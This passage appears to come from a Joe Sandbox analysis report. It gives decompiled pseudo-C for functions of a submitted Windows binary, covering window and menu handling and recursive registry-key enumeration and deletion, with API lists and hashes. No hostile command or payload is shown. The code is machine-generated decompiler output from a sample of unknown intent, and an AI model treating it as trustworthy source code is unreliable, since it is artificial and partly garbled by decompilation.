								do {
									L18:
									_t40 = E004348EB(_t62, _t64, _a4);
									__eflags =  *_t40 - 0x5c;
									_a4 = _t40;
								} while ( *_t40 != 0x5c);
							}
							__eflags = _t68;
							if(_t68 < 0) {
								L22:
								_t68 = _a8;
							} else {
								__eflags = _t68 - _a8;
								if(_t68 >= _a8) {
									goto L22;
								}
							}
							_t54 = _v8;
							E004059F9(_t64, _t68 + _t64, _t68 + _t64, _t54 - _t68 + 1, "\\...", 5);
							__eflags = _t54 + 1;
							_t35 = E0040490E(_t54 + 1, _t62, _t64, _t68 + _t64, _t64, _t54 + 1, _a4);
						} else {
							_push(_v12);
							_push(_v8 + 1);
							goto L7;
						}
					} else {
						if(_a12 != 0) {
							_push(_t35);
							_t61 = _t57 + 1;
							__eflags = _t61;
							_push(_t61);
							L7:
							_push(_t64);
							_t35 = E00414FEE(_t51, _t62, _t64, _t68);
						} else {
							 *_t64 = 0;
						}
					}
				}
				return _t35;
			}


























                  0x004268b6
                  0x004268bb
                  0x004268bc
                  0x004268bd
                  0x004268be
                  0x004268c0
                  0x004268c3
                  0x004268c6
                  0x004268cb
                  0x004268cd
                  0x004268cf
                  0x004268cf
                  0x004268df
                  0x004268e2
                  0x004268e5
                  0x004268ea
                  0x004268ef
                  0x004268f0
                  0x004268f5
                  0x004268f8
                  0x004268fb
                  0x00426904
                  0x00426925
                  0x00426928
                  0x0042692b
                  0x0042692e
                  0x00426930
                  0x00426934
                  0x00426944
                  0x00426944
                  0x00426947
                  0x00000000
                  0x00000000
                  0x0042693b
                  0x00426941
                  0x00426941
                  0x00426944
                  0x00426934
                  0x00426949
                  0x00426949
                  0x0042694c
                  0x0042694e
                  0x00426951
                  0x00426956
                  0x00426959
                  0x0042695c
                  0x0042694e
                  0x00426962
                  0x00426968
                  0x0042696b
                  0x00426990
                  0x00426993
                  0x00426999
                  0x0042699c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042697f
                  0x0042697f
                  0x00426982
                  0x00426987
                  0x0042698b
                  0x0042698b
                  0x0042697f
                  0x0042699e
                  0x004269a0
                  0x004269a7
                  0x004269a7
                  0x004269a2
                  0x004269a2
                  0x004269a5
                  0x00000000
                  0x00000000
                  0x004269a5
                  0x004269aa
                  0x004269bd
                  0x004269c5
                  0x004269c8
                  0x0042696d
                  0x00426970
                  0x00426974
                  0x00000000
                  0x00426974
                  0x00426906
                  0x0042690a
                  0x00426914
                  0x00426915
                  0x00426915
                  0x00426916
                  0x00426917
                  0x00426917
                  0x00426918
                  0x0042690c
                  0x0042690c
                  0x0042690c
                  0x0042690a
                  0x00426904
                  0x004269d4

                  APIs
                  • lstrlenA.KERNEL32(?,?,000000FF), ref: 004268D5
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                    • Part of subcall function 00414FEE: _strcpy_s.LIBCMT ref: 00414FFC
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Exception@8H_prolog3Throw_strcpy_slstrlen
                  • String ID: \...
                  • API String ID: 2411880420-1167917071
                  • Opcode ID: 5c1896904efdc8856ffc91947ccfd4409c0691e1e4a669871dd6449de70afc12
                  • Instruction ID: 209274568c99b8f927e6ccd35cc04ed4cda3847a283bcf010ece59bbc5279a2f
                  • Opcode Fuzzy Hash: 5c1896904efdc8856ffc91947ccfd4409c0691e1e4a669871dd6449de70afc12
                  • Instruction Fuzzy Hash: 1A311BB1A00269BFDF119F15DC40AAE7B64EB41358F52812FFC159B241DB389EC1CB99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040EF7F, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040EF7F(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t34;
				long _t43;
				struct HWND__* _t48;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E00415AD9();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x24)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x48));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x48)) = 0;
				}
				_t64 =  *(_t72 + 0x4c);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
				_t83 =  *(_t72 + 0x3c) & 1;
				if(( *(_t72 + 0x3c) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E0041F396(1, _t64, _t69, _t72, _t83) + 0x3c));
					if(_t71 != 0) {
						_t85 =  *(_t71 + 0x20);
						if( *(_t71 + 0x20) != 0) {
							E00431160(_t71,  &_v52, 0, 0x30);
							_t48 =  *(_t72 + 0x20);
							_v44 = _t48;
							_v40 = _t48;
							_v52 = 0x2c;
							_v48 = 1;
							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
						}
					}
				}
				_t34 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
				_t61 = _t34;
				E0040ED96(_t72, _t85);
				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t34) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf8))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
					}
				}
				E0040EEC5(_t61, _t72);
				return  *((intOrPtr*)( *_t72 + 0x11c))();
			}



















                  0x0040ef8a
                  0x0040ef91
                  0x0040ef97
                  0x0040ef9c
                  0x0040efc1
                  0x0040efc1
                  0x0040efc7
                  0x0040efc9
                  0x0040efc9
                  0x0040efc7
                  0x0040efcc
                  0x0040efd1
                  0x0040efd5
                  0x0040efd8
                  0x0040efd8
                  0x0040efdb
                  0x0040efe3
                  0x0040efe8
                  0x0040efe8
                  0x0040efeb
                  0x0040efef
                  0x0040eff2
                  0x0040eff9
                  0x0040effe
                  0x0040f000
                  0x0040f004
                  0x0040f00e
                  0x0040f013
                  0x0040f019
                  0x0040f01c
                  0x0040f02d
                  0x0040f034
                  0x0040f037
                  0x0040f037
                  0x0040f004
                  0x0040effe
                  0x0040f049
                  0x0040f04d
                  0x0040f04f
                  0x0040f05e
                  0x0040f06a
                  0x0040f06e
                  0x0040f076
                  0x0040f076
                  0x0040f06e
                  0x0040f07e
                  0x0040f091

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: LongWindow$MessageSend_memset
                  • String ID: ,
                  • API String ID: 2997958587-3772416878
                  • Opcode ID: b20ac35b66c4cdd383068926631af7f25a1f3221c8ae416a670efe0955ee868a
                  • Instruction ID: 7f9eb07dc8cd5887cb77f9411831f1f819b3d5f976bf49b5c8f03c9bda67ac66
                  • Opcode Fuzzy Hash: b20ac35b66c4cdd383068926631af7f25a1f3221c8ae416a670efe0955ee868a
                  • Instruction Fuzzy Hash: 0131A331600715AFCB20AF76C884A6AB7E4BF48314F15093EF545A7BD2DB39E815CB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00416B30, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 70%
                  			E00416B30(void* __ebx, void* __ecx, void __edx, void* __edi, void* __esi, void* __eflags) {
				void _t36;
				void* _t46;
				long _t60;
				void* _t65;
				void* _t81;
				void* _t82;
				intOrPtr _t90;

				_t77 = __edx;
				_t68 = __ecx;
				_t67 = __ebx;
				_push(0x124);
				E00431B04(E0044B492, __ebx, __edi, __esi);
				_t81 = __ecx;
				 *(_t82 - 0x120) = 0;
				 *(_t82 - 0x12c) = 0;
				_t36 = E004165DF(__ecx, __edx);
				 *(_t82 - 0x128) = _t36;
				if(_t36 != 0) {
					do {
						_t65 = _t82 - 0x128;
						_push(_t65);
						_t68 = _t81;
						E004165F0();
						if(_t65 != 0) {
							_t77 =  *_t65;
							_t68 = _t65;
							 *((intOrPtr*)( *_t65 + 0xc))(0, 0xfffffffc, 0, 0);
						}
					} while ( *(_t82 - 0x128) != 0);
				}
				if( *((intOrPtr*)(_t81 + 0x54)) != 0) {
					_t90 =  *((intOrPtr*)(_t81 + 0x68));
					_t91 = _t90 == 0;
					if(_t90 == 0) {
						E00406436(_t67, _t68, 0, _t81, _t91);
					}
					_push("Software\\");
					E00406039(_t67, _t82 - 0x11c, _t77, 0, _t81, _t91);
					 *((intOrPtr*)(_t82 - 4)) = 0;
					E00405EC1(_t82 - 0x11c,  *((intOrPtr*)(_t81 + 0x54)));
					_push("\\");
					_push(_t82 - 0x11c);
					_push(_t82 - 0x130);
					_t46 = E00416856(_t67, 0, _t81, _t91);
					_push( *((intOrPtr*)(_t81 + 0x68)));
					 *((char*)(_t82 - 4)) = 1;
					_push(_t46);
					_push(_t82 - 0x124);
					E00416856(_t67, 0, _t81, _t91);
					 *((char*)(_t82 - 4)) = 3;
					E004010B0( *((intOrPtr*)(_t82 - 0x130)) + 0xfffffff0, _t77);
					_push(_t82 - 0x124);
					_t81 = 0x80000001;
					_push(0x80000001);
					E00416900(_t67, _t77, 0, 0x80000001, _t91);
					if(RegOpenKeyA(0x80000001,  *(_t82 - 0x11c), _t82 - 0x120) == 0) {
						_t60 = RegEnumKeyA( *(_t82 - 0x120), 0, _t82 - 0x118, 0x104);
						_t93 = _t60 - 0x103;
						if(_t60 == 0x103) {
							_push(_t82 - 0x11c);
							_push(0x80000001);
							E00416900(_t67, _t77, 0, 0x80000001, _t93);
						}
						RegCloseKey( *(_t82 - 0x120));
					}
					RegQueryValueA(_t81,  *(_t82 - 0x124), _t82 - 0x118, _t82 - 0x12c);
					E004010B0( &(( *(_t82 - 0x124))[0xfffffffffffffff0]), _t77);
					E004010B0( &(( *(_t82 - 0x11c))[0xfffffffffffffff0]), _t77);
				}
				return E00431B87(_t67, 0, _t81);
			}










                  0x00416b30
                  0x00416b30
                  0x00416b30
                  0x00416b30
                  0x00416b3a
                  0x00416b41
                  0x00416b43
                  0x00416b49
                  0x00416b4f
                  0x00416b54
                  0x00416b5c
                  0x00416b5e
                  0x00416b5e
                  0x00416b64
                  0x00416b65
                  0x00416b67
                  0x00416b6e
                  0x00416b70
                  0x00416b77
                  0x00416b79
                  0x00416b79
                  0x00416b7c
                  0x00416b5e
                  0x00416b87
                  0x00416b8f
                  0x00416b95
                  0x00416b97
                  0x00416b99
                  0x00416b99
                  0x00416b9e
                  0x00416ba9
                  0x00416bb7
                  0x00416bba
                  0x00416bbf
                  0x00416bca
                  0x00416bd1
                  0x00416bd2
                  0x00416bd7
                  0x00416bda
                  0x00416bde
                  0x00416be5
                  0x00416be6
                  0x00416bf7
                  0x00416bfb
                  0x00416c06
                  0x00416c07
                  0x00416c0c
                  0x00416c0d
                  0x00416c28
                  0x00416c3d
                  0x00416c43
                  0x00416c48
                  0x00416c50
                  0x00416c51
                  0x00416c52
                  0x00416c52
                  0x00416c5d
                  0x00416c5d
                  0x00416c78
                  0x00416c87
                  0x00416c95
                  0x00416c95
                  0x00416ca2

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 00416B3A
                  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00416C20
                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 00416C3D
                  • RegCloseKey.ADVAPI32(?), ref: 00416C5D
                  • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 00416C78
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CloseEnumH_prolog3_OpenQueryValue
                  • String ID: Software\
                  • API String ID: 1666054129-964853688
                  • Opcode ID: 2c69f8e9fb3cf1b68887677988b198adb23b804070d639b6a360ee49bf6eecd0
                  • Instruction ID: 2bc0dbd4b1b81aecab4d277785a25c5ce037b4448173150856faaa691a74c426
                  • Opcode Fuzzy Hash: 2c69f8e9fb3cf1b68887677988b198adb23b804070d639b6a360ee49bf6eecd0
                  • Instruction Fuzzy Hash: 29418F718001289BCF21EB65CC45ADEB7B9AF49314F1001EAF145E22A1DB389AD1CF99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004146D0, Relevance: 10.6, APIs: 7, Instructions: 96windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E004146D0(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t31;
				char* _t37;
				char* _t46;
				intOrPtr _t51;
				void* _t61;
				char* _t64;
				signed int _t72;
				void* _t74;

				_t61 = __edx;
				_t53 = __ecx;
				_push(4);
				E00431A9B(E0044C66E, __ebx, __edi, __esi);
				_t51 = __ecx;
				 *((intOrPtr*)(_t74 - 0x10)) = __ecx;
				_t76 =  *(_t74 + 0xc) & 0x00000004;
				 *((intOrPtr*)(__ecx + 0xc8)) = 1;
				_t31 = 0x80c83b00;
				if(( *(_t74 + 0xc) & 0x00000004) != 0) {
					_t31 = 0x80c83300;
				}
				if(E00424F26(_t53, _t76, 0, 0, 0x44f0f5, _t31, 0x46279c,  *((intOrPtr*)(_t74 + 8)), 0) != 0) {
					asm("sbb esi, esi");
					_t72 = ( ~( *(_t74 + 0xc) & 0x00005000) & 0xfffff000) + 0x00002000 |  *(_t74 + 0xc) & 0x00000040;
					_t64 = E004133BB(_t51, 0);
					__eflags = _t64;
					if(_t64 != 0) {
						DeleteMenu(_t64[4], 0xf000, 0);
						DeleteMenu(_t64[4], 0xf020, 0);
						DeleteMenu(_t64[4], 0xf030, 0);
						DeleteMenu(_t64[4], 0xf120, 0);
						E004014C0(_t74 + 0xc, _t61);
						 *(_t74 - 4) =  *(_t74 - 4) & 0x00000000;
						_t46 = E00402720(_t74 + 0xc, 0xf011);
						__eflags = _t46;
						if(_t46 != 0) {
							DeleteMenu(_t64[4], 0xf060, 0);
							AppendMenuA(_t64[4], 0, 0xf060,  *(_t74 + 0xc));
						}
						 *(_t74 - 4) =  *(_t74 - 4) | 0xffffffff;
						__eflags =  &(( *(_t74 + 0xc))[0xfffffffffffffff0]);
						E004010B0( &(( *(_t74 + 0xc))[0xfffffffffffffff0]), _t61);
						_t51 =  *((intOrPtr*)(_t74 - 0x10));
					}
					_t65 = _t51 + 0xf8;
					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t51 + 0xf8)) + 0x17c))( *((intOrPtr*)(_t74 + 8)), _t72 | 0x50000000, 0xe81f);
					__eflags = _t37;
					if(_t37 != 0) {
						E004133D6(_t65, _t51);
						_t37 = 1;
					}
					 *(_t51 + 0xc8) =  *(_t51 + 0xc8) & 0x00000000;
					goto L4;
				} else {
					 *(_t51 + 0xc8) = 0;
					L4:
					return E00431B73(_t37);
				}
			}











                  0x004146d0
                  0x004146d0
                  0x004146d0
                  0x004146d7
                  0x004146dc
                  0x004146de
                  0x004146e1
                  0x004146e5
                  0x004146ef
                  0x004146f4
                  0x004146f6
                  0x004146f6
                  0x00414715
                  0x00414732
                  0x00414746
                  0x0041474d
                  0x0041474f
                  0x00414751
                  0x00414767
                  0x00414773
                  0x0041477f
                  0x0041478b
                  0x00414790
                  0x00414795
                  0x004147a1
                  0x004147a6
                  0x004147a8
                  0x004147b4
                  0x004147c3
                  0x004147c3
                  0x004147cc
                  0x004147d0
                  0x004147d3
                  0x004147d8
                  0x004147d8
                  0x004147ea
                  0x004147f4
                  0x004147fa
                  0x004147fc
                  0x0041480d
                  0x00414814
                  0x00414814
                  0x004147fe
                  0x00000000
                  0x00414717
                  0x00414717
                  0x0041471d
                  0x00414722
                  0x00414722

                  APIs
                  • __EH_prolog3.LIBCMT ref: 004146D7
                    • Part of subcall function 004133BB: GetSystemMenu.USER32(?,?), ref: 004133C6
                  • DeleteMenu.USER32(?,0000F000,00000000), ref: 00414767
                  • DeleteMenu.USER32(?,0000F020,00000000), ref: 00414773
                  • DeleteMenu.USER32(?,0000F030,00000000), ref: 0041477F
                  • DeleteMenu.USER32(?,0000F120,00000000), ref: 0041478B
                  • DeleteMenu.USER32(?,0000F060,00000000,0000F011), ref: 004147B4
                  • AppendMenuA.USER32 ref: 004147C3
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Menu$Delete$AppendH_prolog3System
                  • String ID:
                  • API String ID: 1427010815-0
                  • Opcode ID: aff83d87a85b773f964931b9adbbd999ef37a797d0e26fff4b4aa0b383d6ff58
                  • Instruction ID: fa170293c447da0cf328da5eff8f5daf512e33c4efadb7408d9be9ec5d0d8651
                  • Opcode Fuzzy Hash: aff83d87a85b773f964931b9adbbd999ef37a797d0e26fff4b4aa0b383d6ff58
                  • Instruction Fuzzy Hash: 8331E671640606BBEB205F21CC86FB97660AF44754F108239FA296F2E1DB78AC50D75C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00416900, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 88%
                  			E00416900(signed int __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t38;
				void* _t51;
				void* _t54;
				signed int _t57;
				void* _t67;
				void* _t71;
				void* _t73;
				void* _t76;

				_t76 = __eflags;
				_t67 = __edx;
				_t57 = __ebx;
				_push(0x124);
				E00431B3A(E0044B41E, __ebx, __edi, __esi);
				_t71 =  *(_t73 + 8);
				 *(_t73 - 0x12c) = _t71;
				E00405562(_t73 - 0x124, _t76,  *((intOrPtr*)(_t73 + 0xc)));
				 *((intOrPtr*)(_t73 - 4)) = 0;
				if(_t71 == 0x80000000) {
					_t51 = E0041EC3D();
					_t78 = _t51 - 1;
					if(_t51 == 1) {
						_push(_t73 - 0x124);
						_push("Software\\Classes\\");
						_push(_t73 - 0x120);
						_t54 = E004168AB(__ebx, 0, _t71, _t78);
						 *((char*)(_t73 - 4)) = 1;
						E004056C2(__ebx, _t73 - 0x124, _t54);
						 *((char*)(_t73 - 4)) = 0;
						E004010B0( *((intOrPtr*)(_t73 - 0x120)) + 0xfffffff0, _t67);
						 *(_t73 - 0x12c) = 0x80000001;
					}
				}
				_t38 = RegOpenKeyA( *(_t73 - 0x12c),  *(_t73 - 0x124), _t73 - 0x128);
				_t72 = _t38;
				if(_t38 != 0) {
					L11:
					__eflags =  &(( *(_t73 - 0x124))[0xfffffffffffffff0]);
					E004010B0( &(( *(_t73 - 0x124))[0xfffffffffffffff0]), _t67);
					return E00431B96(_t57, 0, _t72);
				} else {
					while(1) {
						_t72 = RegEnumKeyA( *(_t73 - 0x128), 0, _t73 - 0x11c, 0x104);
						_t81 = _t72;
						if(_t72 != 0) {
							break;
						}
						_push(_t73 - 0x11c);
						 *((char*)(_t73 - 4)) = 2;
						E00406039(_t57, _t73 - 0x120, _t67, 0, _t72, _t81);
						 *((char*)(_t73 - 4)) = 3;
						_t72 = E00416900(_t57, _t67, 0, _t72, _t81,  *(_t73 - 0x128), _t73 - 0x120);
						_t57 = _t57 & 0xffffff00 | _t72 != 0x00000000;
						 *((char*)(_t73 - 4)) = 2;
						E004010B0( *((intOrPtr*)(_t73 - 0x120)) + 0xfffffff0, _t67);
						if(_t57 != 0) {
							break;
						}
						 *((intOrPtr*)(_t73 - 4)) = 0;
					}
					__eflags = _t72 - 0x103;
					if(_t72 == 0x103) {
						L9:
						_t72 = RegDeleteKeyA( *(_t73 - 0x12c),  *(_t73 - 0x124));
						L10:
						RegCloseKey( *(_t73 - 0x128));
						goto L11;
					}
					__eflags = _t72 - 0x3f2;
					if(_t72 != 0x3f2) {
						goto L10;
					}
					goto L9;
				}
			}











                  0x00416900
                  0x00416900
                  0x00416900
                  0x00416900
                  0x0041690a
                  0x00416912
                  0x0041691c
                  0x00416922
                  0x00416929
                  0x00416932
                  0x00416934
                  0x00416939
                  0x0041693c
                  0x00416944
                  0x0041694b
                  0x00416950
                  0x00416951
                  0x00416960
                  0x00416964
                  0x00416972
                  0x00416976
                  0x0041697b
                  0x0041697b
                  0x0041693c
                  0x00416998
                  0x0041699e
                  0x004169a2
                  0x00416a66
                  0x00416a6c
                  0x00416a6f
                  0x00416a7b
                  0x004169a8
                  0x004169a8
                  0x004169c1
                  0x004169c3
                  0x004169c5
                  0x00000000
                  0x00000000
                  0x004169cd
                  0x004169d4
                  0x004169d8
                  0x004169ea
                  0x004169f9
                  0x004169fd
                  0x00416a03
                  0x00416a07
                  0x00416a0e
                  0x00000000
                  0x00000000
                  0x00416a10
                  0x00416a10
                  0x00416a36
                  0x00416a3c
                  0x00416a46
                  0x00416a58
                  0x00416a5a
                  0x00416a60
                  0x00000000
                  0x00416a60
                  0x00416a3e
                  0x00416a44
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00416a44

                  APIs
                  • __EH_prolog3_catch_GS.LIBCMT ref: 0041690A
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00416998
                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 004169BB
                    • Part of subcall function 004168AB: __EH_prolog3.LIBCMT ref: 004168B2
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: EnumH_prolog3H_prolog3_catch_Open
                  • String ID: Software\Classes\
                  • API String ID: 3518408925-1121929649
                  • Opcode ID: e3c2d5f4c53faedf68658fe16a846a1c51aaa5f659ad65bbad251e652c178414
                  • Instruction ID: 9bc735b9683b0f1466790649354c91e8bae961b69db05001f0a35a48de0ea7d3
                  • Opcode Fuzzy Hash: e3c2d5f4c53faedf68658fe16a846a1c51aaa5f659ad65bbad251e652c178414
                  • Instruction Fuzzy Hash: D931A331C001289BCF21EB64CD40BDDB7B4AF09350F0141EAE99973291DA345FD48F95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040A4A9, Relevance: 10.6, APIs: 7, Instructions: 80windowthreadCOMMON
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E0040A4A9(intOrPtr* __ecx, long _a4) {
				void* __ebx;
				void* _t26;
				signed int _t27;
				long _t40;
				signed int _t43;
				intOrPtr* _t54;

				_t47 = __ecx;
				_t43 = _a4;
				_t54 = __ecx;
				if(_t43 != 0 && ( *(__ecx + 0x3c) & 0x00000004) != 0) {
					E00412C76(__ecx, 0);
					return SetFocus(0);
				}
				_t26 = E0040EE3C(_t43, _t47, GetParent( *(_t54 + 0x20)));
				if(_t26 == 0) {
					L5:
					if(_t43 != 0) {
						_t27 =  *(_t54 + 0x3c);
						if(_t27 < 0) {
							 *(_t54 + 0x3c) = _t27 & 0xffffff7f;
							 *((intOrPtr*)( *_t54 + 0x104))();
							_a4 =  *(_t54 + 0x20);
							if(GetActiveWindow() == _a4) {
								SendMessageA(_a4, 6, 1, 0);
							}
						}
						if(( *(_t54 + 0x3c) & 0x00000020) != 0) {
							SendMessageA( *(_t54 + 0x20), 0x86, 1, 0);
						}
					} else {
						if( *((intOrPtr*)(_t54 + 0xb8)) == 0) {
							 *(_t54 + 0x3c) =  *(_t54 + 0x3c) | 0x00000080;
							 *((intOrPtr*)( *_t54 + 0x100))();
						}
					}
					asm("sbb ebx, ebx");
					return E00408A69(_t54, ( ~_t43 & 0xfffffff0) + 0x20);
				} else {
					_a4 = 0;
					GetWindowThreadProcessId( *(_t26 + 0x20),  &_a4);
					_t40 = GetCurrentProcessId();
					if(_t40 == _a4) {
						return _t40;
					}
					goto L5;
				}
			}









                  0x0040a4a9
                  0x0040a4af
                  0x0040a4b6
                  0x0040a4ba
                  0x0040a4c3
                  0x00000000
                  0x0040a4c9
                  0x0040a4de
                  0x0040a4e5
                  0x0040a507
                  0x0040a509
                  0x0040a526
                  0x0040a531
                  0x0040a538
                  0x0040a53f
                  0x0040a548
                  0x0040a554
                  0x0040a55f
                  0x0040a55f
                  0x0040a554
                  0x0040a565
                  0x0040a573
                  0x0040a573
                  0x0040a50b
                  0x0040a511
                  0x0040a515
                  0x0040a51e
                  0x0040a51e
                  0x0040a511
                  0x0040a577
                  0x00000000
                  0x0040a4e7
                  0x0040a4ef
                  0x0040a4f2
                  0x0040a4f8
                  0x0040a501
                  0x0040a58b
                  0x0040a58b
                  0x00000000
                  0x0040a501

                  APIs
                  • SetFocus.USER32(00000000,00000000), ref: 0040A4C9
                  • GetParent.USER32(?), ref: 0040A4D7
                  • GetWindowThreadProcessId.USER32(?,?), ref: 0040A4F2
                  • GetCurrentProcessId.KERNEL32 ref: 0040A4F8
                  • GetActiveWindow.USER32 ref: 0040A54B
                  • SendMessageA.USER32(?,00000006,00000001,00000000), ref: 0040A55F
                  • SendMessageA.USER32(?,00000086,00000001,00000000), ref: 0040A573
                    • Part of subcall function 00412C76: EnableWindow.USER32(?,?), ref: 00412C87
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$MessageProcessSend$ActiveCurrentEnableFocusParentThread
                  • String ID:
                  • API String ID: 2169720751-0
                  • Opcode ID: dfdcc4aceaedbd86c3665efdada2bbe5d0073950082cda493ab0cb21491c4667
                  • Instruction ID: 0560ffd8090ea321ddfb3cc0bc89d5341b088f6257bcd32caec06168c9843b40
                  • Opcode Fuzzy Hash: dfdcc4aceaedbd86c3665efdada2bbe5d0073950082cda493ab0cb21491c4667
                  • Instruction Fuzzy Hash: E621F171200700BFCB219F25CCC8F6E7BA4BF44740F24452AF589A72E0D7B8B8508B5A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00440043, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 69COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00440043() {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t10;
				void* _t12;
				intOrPtr _t15;
				intOrPtr* _t16;
				signed int _t19;
				signed int _t20;
				intOrPtr _t26;
				intOrPtr _t27;

				_t5 =  *0x468660;
				_t26 = 0x14;
				if(_t5 != 0) {
					if(_t5 < _t26) {
						_t5 = _t26;
						goto L4;
					}
				} else {
					_t5 = 0x200;
					L4:
					 *0x468660 = _t5;
				}
				_t6 = E004381D6(_t5, 4);
				 *0x467648 = _t6;
				if(_t6 != 0) {
					L8:
